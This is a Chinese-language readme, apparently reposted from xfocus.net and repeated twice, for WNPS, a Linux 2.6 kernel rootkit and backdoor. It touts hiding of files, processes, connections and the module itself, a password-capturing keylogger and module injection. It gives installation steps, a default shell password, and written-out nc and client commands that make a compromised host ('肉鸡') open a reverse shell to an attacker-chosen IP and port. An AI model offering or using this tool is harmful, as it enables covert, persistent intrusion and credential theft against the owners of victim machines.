导读:
WNPS是一只工作在Linux 2.6.x平台下的rootkit+backdoor程序。
它的意思是wnps is not poc shell,我的意图在于将它设计成一个可用于实战的linux rootkit。
它最初的想法来自enyelkm,我对作者的开源精神深表感激。
开发平台:
2.6.9-5.EL
+----------------------------------------------------------------------------------------+
WNPS 功能特点:
-=-=精简测试版只有文件隐藏,目录隐藏,网络连接隐藏,后门伪终端,传输加密这几个最基本的功能-=-=
1、隐藏
隐藏指定文件
隐藏文件中特定的内容
隐藏进程
动态隐藏网络连接、进程-->用过sk的都知道什么是动态隐藏
隐藏自身模块
保护相关模块、进程、文件不被跟踪
2、内核反弹后门
即使肉鸡没有开放任何TCP UDP端口并过滤icmp包,只要肉鸡让回连,我们就可以获得shell
跨内核平台简易安装,拿着一个wnps.ko就可以管理所有2.6内核的机器,所有要做的事情只是执行insmod wnps.ko
完美的伪终端支持,让你用起来更顺心
可以设置定时自动回连,即使你的肉鸡在内网的深处,也不用担心她跑路
3、键盘记录功能
想看看有没其他人在你的肉鸡里跳舞?这个是最好的办法,还可以通过键盘记录把别人的肉鸡给抢了,怎么抢,自己发挥想像空间吧。键盘记录功能对渗透和保护肉鸡都有相当重要的意义。键盘有两种模式,一个是密码模式,就是专门记录密码相关的了,只要触发了相关特征字符串,我们就记录下相应的内容,还有一个就是完全记录模式了,顾名思义了。
4、模块注射
比adore-ng更稳定的模块注射方式
5、通讯加密
+----------------------------------------------------------------------------------------+
WNPS 用法:
服务端使用说明:
在安装之前,请先修改wnps目录下的config.h!!!
TCP_SHELL_KEY 表示要发送的主机密码,默认为@wztshell
HIDE_FILE 表示我们将隐藏以HIDE_FILE字符为前缀的文件
HIDE_TASK 表示我们将隐藏以HIDE_TASK字符为前缀的进程
HIDE_STR 表示我们将隐藏在文件中以HIDE_STR字符为前缀的字符串
HIDE_OPEN 表示我们将隐藏文件中位于HIDE_OPEN和HIDE_CLOSE之间的内容
HIDE_CLOSE
主机需要能够被安装模块以及提供内核源代码。
make;make install
+----------------------------------------------------------------------------------------+
客户端使用说明:
WNPS的客户端将被设计成可以工作在linux和win平台上使用。
1。即可以发送tcp数据报来激活shell,又能用nc来连接服务器的某一端口来发送密码,以及
反弹ip和port。
2。使用方法简单灵活
注意:如果要使用nc做客户端,请先修改服务端和客户端的config.h中的
ENCRYPT 为0。也就是不支持传输加密的功能。
1).在windows平台下,可以用nc作为客户端,连接肉鸡任意开放的一个端口。
比如:
./nc -vvlp 8899
./nc -vv target_ip 22 然后输入密码,反弹ip和port.即可在8899端口获得一个shell。
(1).在本机的8899端口获得一个远程shell。
@wztshell:5566
(2).在192.168.75.128的5566端口获得一个远程shell。
@wztshell:192.168.75.128:5566
2).在linux平台下,即可用nc作为客户端,又可采用自带的client作为客户端,并且允许发送
tcp数据报来激活远程shell。
./client
optinons:
-tcp|packet [victim port] [connect back ip] [connect back port]
-listen [port]
-listen 在本地监听某一端口
-tcp 发送tcp数据报,激活远程shell
为远程服务器地址,必须填写这个参数。
[victim port] 为远程服务器开放的端口,默认将会自动扫描常用开放的端口,在send.h里定义。
[connect back ip] 为你要反弹回的主机地址,默认是本机公网ip地址,必须是可以让肉鸡能够回连的地址。
[connect back port] 为你要反弹回的主机端口,默认为8899,在config.h里定义。
+----------------------------------------------------------------------------+
你可以很灵活的来使用WNPS的client。client默认的监听端口为8899,在client/config.h中设置
设肉鸡ip为:192.168.75.130
注意:如果是要在client端所在的主机上获得远程shell,无须使用-listen选项!
(1).在本机的8899端口上获得一个远程shell。
./client -tcp 192.168.75.130
(2).向肉鸡的22端口发送数据报,然后在本机的8899端口上获得一个远程shell。
./client -tcp 192.168.75.130 22
(3).向肉鸡的22端口发送数据报,然后在本机的5566端口上获得一个远程shell。
./client -tcp 192.168.75.130 22 5566
(4).在192.168.75.128的8899端口上获得一个远程shell。
先在192.168.75.128上使用:
./client -listen
然后在client所在的主机上使用:
./client -tcp 192.168.75.130 192.168.75.128
(5).在192.168.75.128的5566端口上获得一个远程shell。
./client -listen 5566
./client -tcp 192.168.75.130 192.168.75.128 5566
(6).向肉鸡的22端口发送数据报,然后在192.168.75.128的5566端口上获得一个远程shell。
./client -listen 5566
./client -tcp 192.168.75.130 22 192.168.75.128 5566
本文转自
http://www.xfocus.net/tools/200710/1233.html
WNPS是一只工作在Linux 2.6.x平台下的rootkit+backdoor程序。
它的意思是wnps is not poc shell,我的意图在于将它设计成一个可用于实战的linux rootkit。
它最初的想法来自enyelkm,我对作者的开源精神深表感激。
开发平台:
2.6.9-5.EL
+----------------------------------------------------------------------------------------+
WNPS 功能特点:
-=-=精简测试版只有文件隐藏,目录隐藏,网络连接隐藏,后门伪终端,传输加密这几个最基本的功能-=-=
1、隐藏
隐藏指定文件
隐藏文件中特定的内容
隐藏进程
动态隐藏网络连接、进程-->用过sk的都知道什么是动态隐藏
隐藏自身模块
保护相关模块、进程、文件不被跟踪
2、内核反弹后门
即使肉鸡没有开放任何TCP UDP端口并过滤icmp包,只要肉鸡让回连,我们就可以获得shell
跨内核平台简易安装,拿着一个wnps.ko就可以管理所有2.6内核的机器,所有要做的事情只是执行insmod wnps.ko
完美的伪终端支持,让你用起来更顺心
可以设置定时自动回连,即使你的肉鸡在内网的深处,也不用担心她跑路
3、键盘记录功能
想看看有没其他人在你的肉鸡里跳舞?这个是最好的办法,还可以通过键盘记录把别人的肉鸡给抢了,怎么抢,自己发挥想像空间吧。键盘记录功能对渗透和保护肉鸡都有相当重要的意义。键盘有两种模式,一个是密码模式,就是专门记录密码相关的了,只要触发了相关特征字符串,我们就记录下相应的内容,还有一个就是完全记录模式了,顾名思义了。
4、模块注射
比adore-ng更稳定的模块注射方式
5、通讯加密
+----------------------------------------------------------------------------------------+
WNPS 用法:
服务端使用说明:
在安装之前,请先修改wnps目录下的config.h!!!
TCP_SHELL_KEY 表示要发送的主机密码,默认为@wztshell
HIDE_FILE 表示我们将隐藏以HIDE_FILE字符为前缀的文件
HIDE_TASK 表示我们将隐藏以HIDE_TASK字符为前缀的进程
HIDE_STR 表示我们将隐藏在文件中以HIDE_STR字符为前缀的字符串
HIDE_OPEN 表示我们将隐藏文件中位于HIDE_OPEN和HIDE_CLOSE之间的内容
HIDE_CLOSE
主机需要能够被安装模块以及提供内核源代码。
make;make install
+----------------------------------------------------------------------------------------+
客户端使用说明:
WNPS的客户端将被设计成可以工作在linux和win平台上使用。
1。即可以发送tcp数据报来激活shell,又能用nc来连接服务器的某一端口来发送密码,以及
反弹ip和port。
2。使用方法简单灵活
注意:如果要使用nc做客户端,请先修改服务端和客户端的config.h中的
ENCRYPT 为0。也就是不支持传输加密的功能。
1).在windows平台下,可以用nc作为客户端,连接肉鸡任意开放的一个端口。
比如:
./nc -vvlp 8899
./nc -vv target_ip 22 然后输入密码,反弹ip和port.即可在8899端口获得一个shell。
(1).在本机的8899端口获得一个远程shell。
@wztshell:5566
(2).在192.168.75.128的5566端口获得一个远程shell。
@wztshell:192.168.75.128:5566
2).在linux平台下,即可用nc作为客户端,又可采用自带的client作为客户端,并且允许发送
tcp数据报来激活远程shell。
./client
optinons:
-tcp|packet [victim port] [connect back ip] [connect back port]
-listen [port]
-listen 在本地监听某一端口
-tcp 发送tcp数据报,激活远程shell
为远程服务器地址,必须填写这个参数。
[victim port] 为远程服务器开放的端口,默认将会自动扫描常用开放的端口,在send.h里定义。
[connect back ip] 为你要反弹回的主机地址,默认是本机公网ip地址,必须是可以让肉鸡能够回连的地址。
[connect back port] 为你要反弹回的主机端口,默认为8899,在config.h里定义。
+----------------------------------------------------------------------------+
你可以很灵活的来使用WNPS的client。client默认的监听端口为8899,在client/config.h中设置
设肉鸡ip为:192.168.75.130
注意:如果是要在client端所在的主机上获得远程shell,无须使用-listen选项!
(1).在本机的8899端口上获得一个远程shell。
./client -tcp 192.168.75.130
(2).向肉鸡的22端口发送数据报,然后在本机的8899端口上获得一个远程shell。
./client -tcp 192.168.75.130 22
(3).向肉鸡的22端口发送数据报,然后在本机的5566端口上获得一个远程shell。
./client -tcp 192.168.75.130 22 5566
(4).在192.168.75.128的8899端口上获得一个远程shell。
先在192.168.75.128上使用:
./client -listen
然后在client所在的主机上使用:
./client -tcp 192.168.75.130 192.168.75.128
(5).在192.168.75.128的5566端口上获得一个远程shell。
./client -listen 5566
./client -tcp 192.168.75.130 192.168.75.128 5566
(6).向肉鸡的22端口发送数据报,然后在192.168.75.128的5566端口上获得一个远程shell。
./client -listen 5566
./client -tcp 192.168.75.130 22 192.168.75.128 5566
本文转自
http://www.xfocus.net/tools/200710/1233.html